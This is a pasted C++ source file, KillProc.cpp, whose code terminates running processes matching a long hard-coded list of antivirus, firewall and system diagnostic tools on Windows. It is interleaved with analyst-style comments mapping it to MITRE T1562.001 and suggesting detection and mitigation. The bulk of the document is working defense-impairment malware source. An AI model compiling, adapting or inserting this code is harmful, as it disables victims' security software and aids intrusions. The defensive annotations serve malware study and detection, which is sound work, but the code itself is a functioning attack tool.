FlyFar

KillProc.cpp

Mar 26th, 2024
  1. /**************************************
  2. * Kills Antivirus and Firewall associated
  3. * processes.
  4. * Uses basic windows APIs from tlhelp32
  5. * such as: CreateToolhelp32Snapshot
  6. *
  7. *
  8. **************************************/
  9.  
  10. #define WIN32_LEAN_AND_MEAN
  11. #include <windows.h>
  12. #include <tlhelp32.h>
  13.  #include <lm.h>
  14.  
  15. int KillProcess(const char *);
  16.  
  /*
   * endAvSoft: walks a hard-coded, 0-terminated table of executable names and
   * calls KillProcess() once per entry. The result of each call is discarded
   * and the function always returns 0.
   *
   * Analyst notes (defensive reading of this sample):
   *  - Behaviour class: defense impairment (MITRE ATT&CK T1562.001,
   *    Impair Defenses: Disable or Modify Tools).
   *  - The table is mostly antivirus / personal-firewall image names together
   *    with their updaters and installers, but it also contains general
   *    diagnostic and admin tools (MSCONFIG.EXE, NETSTAT.EXE, TASKMON.EXE,
   *    SFC.EXE, DRWATSON.EXE, TRACERT.EXE, PROCEXPLORERV1.0.EXE). Sudden loss
   *    of those tools on a host is therefore a symptom worth triaging too.
   *  - NOTE(review): "avserve2.exe" looks like an image name associated with
   *    the Sasser worm rather than a security product; confirm before
   *    attributing intent to that entry.
   *  - The names are stored as plain ASCII literals in one contiguous array,
   *    so the table itself is a static indicator: a string/YARA rule that
   *    requires several of the rarer entries together is a reasonable hunt.
   *  - Matching is by image name only (see KillProcess), so products that run
   *    as protected processes or enforce tamper protection are not dependent
   *    on their process name being unknown to samples like this.
   */
  17. int endAvSoft()
  18. {
      // Target table: 0-terminated array of process image names.
  19.     const char *exelst[] = { "AGENTSVR.EXE", "ANTI-TROJAN.EXE","ANTIVIRUS.EXE","ANTS.EXE","APIMONITOR.EXE","APLICA32.EXE","APVXDWIN.EXE","ATCON.EXE","ATGUARD.EXE","ATRO55EN.EXE","ATUPDATER.EXE","ATWATCH.EXE","AUPDATE.EXE","AUTODOWN.EXE","AUTOTRACE.EXE","AUTOUPDATE.EXE","AVCONSOL.EXE","AVGSERV9.EXE","AVLTMAIN.EXE","AVPUPD.EXE","AVSYNMGR.EXE","AVWUPD32.EXE","AVXQUAR.EXE","AVprotect9x.exe","Au.exe","BD_PROFESSIONAL.EXE","BIDEF.EXE","BIDSERVER.EXE","BIPCP.EXE","BIPCPEVALSETUP.EXE","BISP.EXE","BLACKD.EXE","BLACKICE.EXE","BOOTWARN.EXE","BORG2.EXE","BS120.EXE","CDP.EXE","CFGWIZ.EXE","CFIADMIN.EXE","CFIAUDIT.EXE","CFINET.EXE","CFINET32.EXE","CLEAN.EXE","CLEANER.EXE","CLEANER3.EXE","CLEANPC.EXE","CMGRDIAN.EXE","CMON016.EXE",
  20. "CPD.EXE","CPF9X206.EXE","CPFNT206.EXE","CV.EXE","CWNB181.EXE","CWNTDWMO.EXE","D3dupdate.exe","DEFWATCH.EXE","DEPUTY.EXE","DPF.EXE","DPFSETUP.EXE","DRWATSON.EXE","DRWEBUPW.EXE","ENT.EXE","ESCANH95.EXE","ESCANHNT.EXE","ESCANV95.EXE","EXANTIVIRUS-CNET.EXE","FAST.EXE","FIREWALL.EXE","FLOWPROTECTOR.EXE","FP-WIN_TRIAL.EXE","FRW.EXE","FSAV.EXE","FSAV530STBYB.EXE","FSAV530WTBYB.EXE","FSAV95.EXE","GBMENU.EXE","GBPOLL.EXE","GUARD.EXE","HACKTRACERSETUP.EXE","HTLOG.EXE","HWPE.EXE","IAMAPP.EXE","IAMAPP.EXE","IAMSERV.EXE","ICLOAD95.EXE","ICLOADNT.EXE","ICMON.EXE","ICSSUPPNT.EXE","ICSUPP95.EXE","ICSUPPNT.EXE","IFW2000.EXE","IPARMOR.EXE","IRIS.EXE","JAMMER.EXE","KAVLITE40ENG.EXE",
  21. "KAVPERS40ENG.EXE","KERIO-PF-213-EN-WIN.EXE","KERIO-WRL-421-EN-WIN.EXE","KERIO-WRP-421-EN-WIN.EXE","KILLPROCESSSETUP161.EXE","LDPRO.EXE","LOCALNET.EXE","LOCKDOWN.EXE","LOCKDOWN2000.EXE","LSETUP.EXE","LUALL.EXE","LUCOMSERVER.EXE","LUINIT.EXE","MCAGENT.EXE","MCUPDATE.EXE","MFW2EN.EXE","MFWENG3.02D30.EXE","MGUI.EXE","MINILOG.EXE","MOOLIVE.EXE","MRFLUX.EXE","MSCONFIG.EXE","MSINFO32.EXE","MSSMMC32.EXE","MU0311AD.EXE","NAV80TRY.EXE","NAVAPW32.EXE","NAVDX.EXE","NAVSTUB.EXE","NAVW32.EXE","NC2000.EXE","NCINST4.EXE","NDD32.EXE","NEOMONITOR.EXE","NETARMOR.EXE","NETINFO.EXE","NETMON.EXE","NETSCANPRO.EXE","NETSPYHUNTER-1.2.EXE","NETSTAT.EXE","NISSERV.EXE","NISUM.EXE","NMAIN.EXE","NORTON_INTERNET_SECU_3.0_407.EXE",
  22. "NPF40_TW_98_NT_ME_2K.EXE","NPFMESSENGER.EXE","NPROTECT.EXE","NSCHED32.EXE","NTVDM.EXE","NUPGRADE.EXE","NVARCH16.EXE","NWINST4.EXE","NWTOOL16.EXE","OSTRONET.EXE","OUTPOST.EXE","OUTPOSTINSTALL.EXE","OUTPOSTPROINSTALL.EXE","PADMIN.EXE","PANIXK.EXE","PAVPROXY.EXE","PCC2002S902.EXE","PCC2K_76_1436.EXE","PCCIOMON.EXE","PCDSETUP.EXE","PCFWALLICON.EXE","PCIP10117_0.EXE","PDSETUP.EXE","PERISCOPE.EXE","PERSFW.EXE","PF2.EXE","PFWADMIN.EXE","PINGSCAN.EXE","PLATIN.EXE","POPROXY.EXE","POPSCAN.EXE","PORTDETECTIVE.EXE","PPINUPDT.EXE","PPTBC.EXE","PPVSTOP.EXE","PROCEXPLORERV1.0.EXE","PROPORT.EXE","PROTECTX.EXE","PSPF.EXE","PURGE.EXE","PVIEW95.EXE","QCONSOLE.EXE","QSERVER.EXE","RAV8WIN32ENG.EXE","RESCUE.EXE","RESCUE32.EXE",
  23. "RRGUARD.EXE","RSHELL.EXE","RTVSCN95.EXE",
  24. "RULAUNCH.EXE","SAFEWEB.EXE","SBSERV.EXE","SD.EXE","SETUPVAMEEVAL.EXE","SETUP_FLOWPROTECTOR_US.EXE","SFC.EXE","SGSSFW32.EXE","avserve2.exe","SHELLSPYINSTALL.EXE","SHN.EXE","SMC.EXE","SOFI.EXE","SPF.EXE","SPHINX.EXE","SPYXX.EXE","SS3EDIT.EXE","ST2.EXE","SUPFTRL.EXE","SUPPORTER5.EXE","SYMPROXYSVC.EXE","SYSEDIT.EXE","TASKMON.EXE","TAUMON.EXE","TAUSCAN.EXE","TC.EXE","TCA.EXE","TCM.EXE","TDS-3.EXE","TDS2-98.EXE","TDS2-NT.EXE","TFAK5.EXE","TGBOB.EXE","TITANIN.EXE","TITANINXP.EXE","TRACERT.EXE","TRJSCAN.EXE","TRJSETUP.EXE","TROJANTRAP3.EXE","UNDOBOOT.EXE","UPDATE.EXE","VBCMSERV.EXE","VBCONS.EXE","VBUST.EXE","VBWIN9X.EXE","VBWINNTW.EXE",
  25. "VCSETUP.EXE","VFSETUP.EXE","VIRUSMDPERSONALFIREWALL.EXE","VNLAN300.EXE","VNPC3000.EXE","VPC42.EXE","VPFW30S.EXE","VPTRAY.EXE","VSCENU6.02D30.EXE","VSECOMR.EXE","VSHWIN32.EXE","VSISETUP.EXE","VSMAIN.EXE","VSMON.EXE","VSSTAT.EXE","VSWIN9XE.EXE","VSWINNTSE.EXE","VSWINPERSE.EXE","W32DSM89.EXE","W9X.EXE","WATCHDOG.EXE","WEBSCANX.EXE","WGFE95.EXE","WHOSWATCHINGME.EXE","WINRECON.EXE","WNT.EXE","WRADMIN.EXE","WRCTRL.EXE","WSBGATE.EXE","WYVERNWORKSFIREWALL.EXE","XPF202EN.EXE","ZAPRO.EXE","ZAPSETUP3001.EXE","ZATUTOR.EXE","ZAUINST.EXE","ZONALM2601.EXE","ZONEALARM.EXE","CCAPP.exe", 0 };
  26.  
  27.  
  28.                        
  29. register int m;
  30.  
      // One KillProcess() call per table entry; the loop stops at the 0 sentinel.
  31.     for (m=0; exelst[m]; m++)
  32.  
      // Return code ignored: a failure for one name does not end the sweep.
  33.  KillProcess(exelst[m]);
  34.    
  35.  
  36.    
  37.     return 0;
  38. }
  39.  
  /*
   * KillProcess: looks for a running process whose module base name equals
   * szToTerminate and calls TerminateProcess() on it. It returns as soon as
   * one match has been handled, so at most one process is terminated per call.
   *
   * Parameter:
   *   szToTerminate - image name to look for; an upper-cased copy is built
   *                   locally and used for the comparisons.
   *
   * Return codes, as visible in the body:
   *     0  a matching process was terminated
   *   602  TerminateProcess() failed on the match
   *   603  no matching process found
   *   604  OpenProcess(PROCESS_TERMINATE) failed on the match
   *   605  PSAPI.DLL could not be loaded
   *   606  GetVersionEx() failed
   *   607  platform id is neither NT nor Win9x
   *   632  name length below 1 or above MAX_PATH
   *   700  a PSAPI export could not be resolved
   *   701  EnumProcesses() failed
   *   702  Kernel32.DLL could not be loaded
   *   703  a ToolHelp export could not be resolved
   *   704  CreateToolhelp32Snapshot() failed
   *
   * Analyst notes (defensive reading):
   *  - Observable sequence: process enumeration, then OpenProcess() requesting
   *    PROCESS_TERMINATE on another process, then TerminateProcess(). Handle
   *    requests carrying the terminate right against security-product
   *    processes are what process-access telemetry (for example Sysmon
   *    ProcessAccess events, which record the granted access mask) is meant
   *    to surface; pair that with unexpected exits of those processes.
   *  - The enumeration APIs are resolved at run time with LoadLibraryA /
   *    GetProcAddress, so they need not appear in the import table. Their
   *    names are still present as plain strings in the binary, and
   *    OpenProcess / TerminateProcess are called directly.
   *  - Nothing in this function changes the caller's token or privileges:
   *    OpenProcess() succeeds only where the caller's account already has
   *    access (otherwise the function returns 604). Least-privilege user
   *    accounts and product self-protection (protected processes, tamper
   *    protection) are the relevant mitigations.
   */
  40. int KillProcess(const char *szToTerminate)
  41.  
  42. {
  43.     BOOL bResult,bResultm;
  44.     DWORD aiPID[1000],iCb=1000,iNumProc,iV2000=0;
  45.     DWORD iCbneeded,i,iFound=0;
  46.     char szName[MAX_PATH],szToTermUpper[MAX_PATH];
  47.     HANDLE hProc,hSnapShot,hSnapShotm;
  48.     OSVERSIONINFO osvi;
  49.     HINSTANCE hInstLib;
  50.     int iLen,iLenP,indx;
  51.     HMODULE hMod;
  52.     PROCESSENTRY32 procentry;      
  53.     MODULEENTRY32 modentry;
      // Validate the name length, then build the upper-cased copy used for matching.
  54.     iLenP=strlen(szToTerminate);
  55.     if(iLenP<1 || iLenP>MAX_PATH) return 632;
  56.     for(indx=0;indx<iLenP;indx++)
  57.         szToTermUpper[indx]=toupper(szToTerminate[indx]);
  58.     szToTermUpper[iLenP]=0;
      // Function pointers for the enumeration APIs; filled in below via GetProcAddress.
  59.      BOOL (WINAPI *lpfEnumProcesses)( DWORD *, DWORD cb, DWORD * );
  60.      BOOL (WINAPI *lpfEnumProcessModules)( HANDLE, HMODULE *,
  61.         DWORD, LPDWORD );
  62.      DWORD (WINAPI *lpfGetModuleBaseName)( HANDLE, HMODULE,
  63.         LPTSTR, DWORD );
  64.       HANDLE (WINAPI *lpfCreateToolhelp32Snapshot)(DWORD,DWORD) ;
  65.       BOOL (WINAPI *lpfProcess32First)(HANDLE,LPPROCESSENTRY32) ;
  66.       BOOL (WINAPI *lpfProcess32Next)(HANDLE,LPPROCESSENTRY32) ;
  67.       BOOL (WINAPI *lpfModule32First)(HANDLE,LPMODULEENTRY32) ;
  68.       BOOL (WINAPI *lpfModule32Next)(HANDLE,LPMODULEENTRY32) ;
      // The platform id from GetVersionEx selects one of two enumeration back ends.
  69.     osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  70.     bResult=GetVersionEx(&osvi);
  71.     if(!bResult)  
  72.         return 606;
  73.     if((osvi.dwPlatformId != VER_PLATFORM_WIN32_NT) &&
  74.         (osvi.dwPlatformId != VER_PLATFORM_WIN32_WINDOWS))
  75.         return 607;
  76.  
      // NT-family branch: enumerate through PSAPI, resolved at run time.
  77.     if(osvi.dwPlatformId==VER_PLATFORM_WIN32_NT)
  78.     {  
  79.          hInstLib = LoadLibraryA("PSAPI.DLL");
  80.          if(hInstLib == NULL)
  81.             return 605;
  82.  
  83.        
  84.          lpfEnumProcesses = (BOOL(WINAPI *)(DWORD *,DWORD,DWORD*))
  85.             GetProcAddress( hInstLib, "EnumProcesses" ) ;
  86.          lpfEnumProcessModules = (BOOL(WINAPI *)(HANDLE, HMODULE *,
  87.             DWORD, LPDWORD)) GetProcAddress( hInstLib,
  88.             "EnumProcessModules" ) ;
  89.          lpfGetModuleBaseName =(DWORD (WINAPI *)(HANDLE, HMODULE,
  90.             LPTSTR, DWORD )) GetProcAddress( hInstLib,
  91.             "GetModuleBaseNameA" ) ;
  92.  
  93.          if(lpfEnumProcesses == NULL ||
  94.             lpfEnumProcessModules == NULL ||
  95.             lpfGetModuleBaseName == NULL)
  96.             {
  97.                FreeLibrary(hInstLib);
  98.                return 700;
  99.             }
  100.          
          // Fetch the PID list into aiPID; iCb is passed as the size argument.
  101.         bResult=lpfEnumProcesses(aiPID,iCb,&iCbneeded);
  102.         if(!bResult)
  103.         {
  104.             FreeLibrary(hInstLib);
  105.             return 701;
  106.         }
  107.  
  108.  
  109.         iNumProc=iCbneeded/sizeof(DWORD);
  110.  
  111.        
  112.         for(i=0;i<iNumProc;i++)
  113.         {
              // szName keeps the placeholder "Unknown" when the process cannot be opened or queried.
  114.             strcpy(szName,"Unknown");
              // First handle: query/read access only, used to obtain the module base name.
  115.             hProc=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,FALSE,
  116.                 aiPID[i]);
  117.             if(hProc)
  118.             {
  119.                if(lpfEnumProcessModules(hProc,&hMod,sizeof(hMod),&iCbneeded) )
  120.                {
  121.                   iLen=lpfGetModuleBaseName(hProc,hMod,szName,MAX_PATH);
  122.                }
  123.             }
  124.             CloseHandle(hProc);
  125.  
              // NOTE(review): two consecutive comparisons (strupr, then _strupr) with no
              // statement between them; as written the second nests inside the first.
              // This looks like a paste or merge artifact - confirm against another copy.
  126.             if(strcmp(strupr(szName),szToTermUpper)==0)
  127.  
  128.             if(strcmp(_strupr(szName),szToTermUpper)==0)
  129.  
  130.             {
  131.                 iFound=1;
                  // Second handle on the same PID, this time requesting PROCESS_TERMINATE.
                  // This access request is the event to alert on.
  132.                 hProc=OpenProcess(PROCESS_TERMINATE,FALSE,aiPID[i]);
  133.                 if(hProc)
  134.                 {
  135.                     if(TerminateProcess(hProc,0))
  136.                     {
  137.                         CloseHandle(hProc);
  138.                         FreeLibrary(hInstLib);
  139.                         return 0;
  140.                     }
  141.                     else
  142.                     {
  143.                         CloseHandle(hProc);
  144.                         FreeLibrary(hInstLib);
  145.                         return 602;
  146.                     }
  147.                 }
  148.                 else
  149.                 {
                      // Access denied or process gone: reported as 604, no retry.
  150.                     FreeLibrary(hInstLib);
  151.                     return 604;
  152.                 }
  153.             }
  154.         }
  155.     }
  156.  
      // Win9x-family branch: enumerate with the ToolHelp snapshot API resolved from Kernel32.
  157.     if(osvi.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS)
  158.     {
  159.        
  160.            
  161.         hInstLib = LoadLibraryA("Kernel32.DLL");
  162.         if( hInstLib == NULL )
  163.             return 702;
  164.  
  165.        
  166.         lpfCreateToolhelp32Snapshot=
  167.             (HANDLE(WINAPI *)(DWORD,DWORD))
  168.             GetProcAddress( hInstLib,
  169.             "CreateToolhelp32Snapshot" ) ;
  170.         lpfProcess32First=
  171.             (BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
  172.             GetProcAddress( hInstLib, "Process32First" ) ;
  173.         lpfProcess32Next=
  174.             (BOOL(WINAPI *)(HANDLE,LPPROCESSENTRY32))
  175.             GetProcAddress( hInstLib, "Process32Next" ) ;
  176.         lpfModule32First=
  177.             (BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
  178.             GetProcAddress( hInstLib, "Module32First" ) ;
  179.         lpfModule32Next=
  180.             (BOOL(WINAPI *)(HANDLE,LPMODULEENTRY32))
  181.             GetProcAddress( hInstLib, "Module32Next" ) ;
  182.         if( lpfProcess32Next == NULL ||
  183.             lpfProcess32First == NULL ||
  184.             lpfModule32Next == NULL ||
  185.             lpfModule32First == NULL ||
  186.             lpfCreateToolhelp32Snapshot == NULL )
  187.         {
  188.             FreeLibrary(hInstLib);
  189.             return 703;
  190.         }
  191.            
  192.        
  193.  
          // System-wide process snapshot; each entry is then inspected module by module.
  194.         hSnapShot = lpfCreateToolhelp32Snapshot(
  195.             TH32CS_SNAPPROCESS, 0 ) ;
  196.         if( hSnapShot == INVALID_HANDLE_VALUE )
  197.         {
  198.             FreeLibrary(hInstLib);
  199.             return 704;
  200.         }
  201.        
  202.        
  203.         procentry.dwSize = sizeof(PROCESSENTRY32);
  204.         bResult=lpfProcess32First(hSnapShot,&procentry);
  205.  
  206.        
  207.         while(bResult)
  208.         {
  209.            
              // Per-process module snapshot; a failure here ends the whole call with 704.
  210.             hSnapShotm = lpfCreateToolhelp32Snapshot(
  211.                 TH32CS_SNAPMODULE, procentry.th32ProcessID) ;
  212.             if( hSnapShotm == INVALID_HANDLE_VALUE )
  213.             {
  214.                 CloseHandle(hSnapShot);
  215.                 FreeLibrary(hInstLib);
  216.                 return 704;
  217.             }
  218.            
  219.             modentry.dwSize=sizeof(MODULEENTRY32);
  220.             bResultm=lpfModule32First(hSnapShotm,&modentry);
  221.  
  222.            
  223.             while(bResultm)
  224.             {
                  // Module name is compared as returned against the upper-cased target.
  225.                 if(strcmp(modentry.szModule,szToTermUpper)==0)
  226.                 {
  227.                    
  228.                     iFound=1;
  229.                    
                      // Same terminate-access request as in the NT branch.
  230.                     hProc=OpenProcess(PROCESS_TERMINATE,FALSE,procentry.th32ProcessID);
  231.                     if(hProc)
  232.                     {
  233.                         if(TerminateProcess(hProc,0))
  234.                         {
  235.                            
  236.                             CloseHandle(hSnapShotm);
  237.                             CloseHandle(hSnapShot);
  238.                             CloseHandle(hProc);
  239.                             FreeLibrary(hInstLib);
  240.                             return 0;
  241.                         }
  242.                         else
  243.                         {
  244.                            
  245.                             CloseHandle(hSnapShotm);
  246.                             CloseHandle(hSnapShot);
  247.                             CloseHandle(hProc);
  248.                             FreeLibrary(hInstLib);
  249.                             return 602;
  250.                         }
  251.                     }
  252.                     else
  253.                     {
  254.                        
  255.                         CloseHandle(hSnapShotm);
  256.                         CloseHandle(hSnapShot);
  257.                         FreeLibrary(hInstLib);
  258.                         return 604;
  259.                     }
  260.                 }
  261.                 else
  262.                 {  
  263.                     modentry.dwSize=sizeof(MODULEENTRY32);
  264.                     bResultm=lpfModule32Next(hSnapShotm,&modentry);
  265.                 }
  266.             }
  267.  
  268.            
  269.             CloseHandle(hSnapShotm);
  270.             procentry.dwSize = sizeof(PROCESSENTRY32);
  271.             bResult = lpfProcess32Next(hSnapShot,&procentry);
  272.         }
  273.         CloseHandle(hSnapShot);
  274.     }
      // Reached only when neither branch returned early; iFound==0 means no name matched.
  275.     if(iFound==0)
  276.     {
  277.         FreeLibrary(hInstLib);
  278.         return 603;
  279.     }
  280.     FreeLibrary(hInstLib);
  281.     return 0;
  282. }
  283.  